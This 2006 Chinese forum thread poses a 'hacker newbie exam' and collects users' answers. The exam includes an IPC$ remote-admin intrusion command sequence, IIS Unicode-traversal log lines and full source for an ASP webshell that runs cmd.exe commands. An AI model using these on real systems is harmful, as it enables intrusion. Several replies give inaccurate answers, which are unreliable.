返回列表 发帖
bahkhgm 该用户已被删除
楼主 跳转到 » 正序看帖
打印
tT
bahkhgm发表于 2006-1-2 18:09 | 只看该作者

一份黑客菜鸟试卷

一、 http://192.168.0.1 http://xyz.3322.org http://3232235521 三个连接指向同一目标网站,那么它们分别是什么意义? 二、 常用端口识别 20 21 23 25 80 110 139 443 445 三、 试述下列命令作用 c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” c:\>net use z: \\211.87.194.121\c$ c:\>net time \\211.87.194.121 c:\>copy abc.exe \\211.87.194.121\admin$\system32 四、 试述下列命令的区别,如何防止该命令在本地或远程运行 c:\>at \\211.87.194.121 21:05 abc.exe c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 五、 W3SVC日志是什么?分析下面这段日志。 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 分析我酌情给分。 六、 netstat命令有何作用,举出两个参数进行说明。 七、 试述木马的一些基本特征。 八、 如何利用脚本实现对ftp的自动操作? 九、 下面是一个ASP木马,请找出支持这一程序的关键点。 <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
" method="POST"> 
 
<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分) 
那么,如何在不打补丁的情况下避免这种攻击的发生? 
十一、OSI模型中哪一层上有协议?分别是什么? 
十二、观察ping命令的返回包的TTL值,可以了解到什么? 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69 
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业? 
十四、谈谈你对hacker和网络安全的认识 

A-MD wrote: 
一、 
http://192.168.0.1网站的IP,是个内网IP哦 
http://xyz.3322.org网站的FQDN名 
http://3232235521 ??? 
三个连接指向同一目标网站,那么它们分别是什么意义? 
二、 
常用端口识别 
20 21 23 
25 80 110 
139 443 445 
三、 
试述下列命令作用 
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” 以用户administrator密码123456建立与211.87.194.121的IPC$连接,成功后………… 
c:\>net use z: \\211.87.194.121\c$ 把211.87.194.121的C盘映射为本地的Z盘,以后用211.87.194.121的C盘就像是用本地硬盘一样了 
c:\>net time \\211.87.194.121 看211.87.194.121上现在的时间 
c:\>copy abc.exe \\211.87.194.121\admin$\system32 
把abc.exe (大多是木马服务端)文件复制到211.87.194.121的X:\windows\system32里面(X为系统盘) 
这个大题是最有把握的,原因吗………… 
四、 
试述下列命令的区别,如何防止该命令在本地或远程运行 
c:\>at \\211.87.194.121 21:05 abc.exe 211.87.194.121上的时间为21:05时运行abc.exe 
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 本地时间为21:05时运行211.87.194.121上的abc.exe 
只有在启动了schedule服务后at命令才能被执行 
五、 
W3SVC日志是什么?分析下面这段日志。 INTERNET信息服务WWW日志 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 
分析我酌情给分。 
具体每行的情况不是很清楚,好像是有人利用UNICODE漏洞看能不能用DIR命令获得211.87.215.81上的文件列表,如果成功的话就会有进一步的动作了 
六、 
netstat命令有何作用,举出两个参数进行说明。 
七、 
试述木马的一些基本特征。 
CS模型,开机自启等 
八、 
如何利用脚本实现对ftp的自动操作? 
九、 
下面是一个ASP木马,请找出支持这一程序的关键点。 
<%@ Language=VBScript %> 
<% 
Dim oScript 
Dim oScriptNet 
Dim oFileSys, oFile 
Dim szCMD, szTempFile 
On Error Resume Next 
Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
szCMD = Request.Form(".CMD") 
If (szCMD <> "") Then 
szTempFile = "C:\" & oFileSys.GetTempName( ) 
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
End If 
%> 
 
 

" method="POST"> 
 
 

 

 
<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分) 
那么,如何在不打补丁的情况下避免这种攻击的发生? 
十一、OSI模型中哪一层上有协议?分别是什么? 
应用层:TELNET,SMTP,HTTP,FTP,DNS 
传输层:TCP,UDP,SPX 
网络层:IP,IPX,ARP,ICMP,RARP 
十二、观察ping命令的返回包的TTL值,可以了解到什么? 
可以知道对方把信息传过来时经过了几个路由器 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69 
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业? 
192.168.0.1是一个WWW服务器,192.168.0.3正在访问,并且是开了两个网页,HTTP协议,最后一个端口69的不知道
收藏 分享

33415790 该用户已被删除
13
33415790发表于 2006-4-2 10:32 | 只看该作者

一份黑客菜鸟试卷

...........

TOP

鸿 该用户已被删除
12
鸿发表于 2006-4-1 15:09 | 只看该作者

一份黑客菜鸟试卷

我不懂,是个菜菜小鸟。

TOP

ouli 该用户已被删除
11
ouli发表于 2006-3-31 12:39 | 只看该作者

一份黑客菜鸟试卷

只能答上6题~~

TOP

king5312 该用户已被删除
10
king5312发表于 2006-3-17 00:54 | 只看该作者

一份黑客菜鸟试卷

一、
http://192.168.0.1  目标网站IP!
http://xyz.3322.org   目标网站域名
http://3232235521  ??
三个连接指向同一目标网站,那么它们分别是什么意义?
二、
常用端口识别
21 80 139  443 不是黑客就用这几个
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc&#36; “123456”/user:”administrator”
用账号administrator密码123456与211.87.794.121建立ICP&#36;连接
c:\>net use z: \\211.87.194.121\c&#36;
映射211.87.194.121的C盘为本地Z盘
c:\>net time \\211.87.194.121
查看211.87.194.121的时间
c:\>copy abc.exe \\211.87.194.121\admin&#36;\system32
拷贝ABC.EXE到211.87.194.121的SYSTEM32下
四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
当目标机211.87.194.121到21:05时运行ABC.EXE
c:\>at 21:05 \\211.87.194.121\admin&#36;\system32\abc.exe
当本地时间到21:05运行目标机211.87.194.121SYSTEM32目录下的ABC.EXE
五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。
这个没有注意过!不懂!
六、
netstat命令有何作用,举出两个参数进行说明。
查询网路资料
七、
试述木马的一些基本特征。
以窃取中马者密码为主,
八、
如何利用脚本实现对ftp的自动操作?
半桶水响!

TOP

bluexxk 该用户已被删除
9
bluexxk发表于 2006-3-16 18:08 | 只看该作者

一份黑客菜鸟试卷

只知道第一题和第二题的部分

TOP

xue82043703 该用户已被删除
8
xue82043703发表于 2006-1-7 08:43 | 只看该作者

一份黑客菜鸟试卷

妈妈,这个也叫菜鸟做的啊!偶那不成小小菜鸟了,偶把偶会说的说下吧,其他不知道楼主看给几分吧!
第一题,第一个是IP地址啊.下面那个是不是网址,第3个一串数字的不懂
第二题,23是TELNET.80是HTTP,其他不清楚
第三题,第一段是进到那个IP的机器里.拥护是超级,密码为123456,后面几个没试过哦
第四和第五不知道
第六题,那个命令是浏览本机目前开的端口号的吧.防止木马有点作用
第七题,特征是隐蔽.控制力强,传播比病毒烂点CS模式是服务器/客户机 开机自启就不清楚了
接下去的都不知道了

TOP

divico 该用户已被删除
7
divico发表于 2006-1-6 18:52 | 只看该作者

一份黑客菜鸟试卷

才勉强能回答5道吧....
答对几道才算过关啊??

TOP

李风 该用户已被删除
6
李风发表于 2006-1-3 22:19 | 只看该作者

一份黑客菜鸟试卷

我不懂,是个菜菜小鸟。

TOP

kkting 该用户已被删除
5
kkting发表于 2006-1-3 17:50 | 只看该作者

一份黑客菜鸟试卷

下面引用由nainiou2006/01/02 08:56pm 发表的内容:
看的懂一些,大多都不懂,所以我是菜鸟!

那些不懂,说出来大家一起讨论。

TOP

x86 该用户已被删除
地板
x86发表于 2006-1-2 22:46 | 只看该作者

一份黑客菜鸟试卷

一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站,那么它们分别是什么意义?
第一个是目标服务器的ip地址,第二个则是其域名地址,其真正ip则需要dns服务来解析。第三个则为目标ip的10进制形式
二、
常用端口识别
20 21 23
25 80 110
139 443 445
20 ftp文本传输端口
21 ftp二进制流传输端口
23 telnet服务
25 smtp
80 web服务
139 netbios
学习完计算机网络,至少会懂一半.

TOP

nainiou 该用户已被删除
板凳
nainiou发表于 2006-1-2 20:56 | 只看该作者

一份黑客菜鸟试卷

看的懂一些,大多都不懂,所以我是菜鸟!

TOP

返回列表 回复 发帖